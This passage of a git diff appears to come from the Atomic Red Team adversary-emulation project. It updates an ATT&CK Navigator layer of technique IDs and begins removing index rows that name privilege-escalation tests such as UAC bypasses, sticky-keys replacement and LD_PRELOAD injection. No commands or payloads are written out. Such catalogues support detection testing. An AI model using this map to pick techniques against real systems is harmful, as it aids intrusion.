"score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniq
ueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T12
18.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"tec
hniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":
true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T15
74.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":t
rue},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","
score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":
true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"te
chniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":
true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enable
d":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"te
chniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1cf5554e..4fefac9b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -1,200 +1,8 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell -privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt -privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt -privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt -privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell -privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell -privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt -privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh -privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt -privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt -privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell -privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using 
Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt -privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell -privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell -privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt -privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell -privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt -privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell -privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell -privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell -privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt -privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash -privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt -privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe 
binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt -privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell -privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh -privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt -privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt -privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash -privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash -privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash -privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash -privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash -privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt -privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual -privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt -privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL 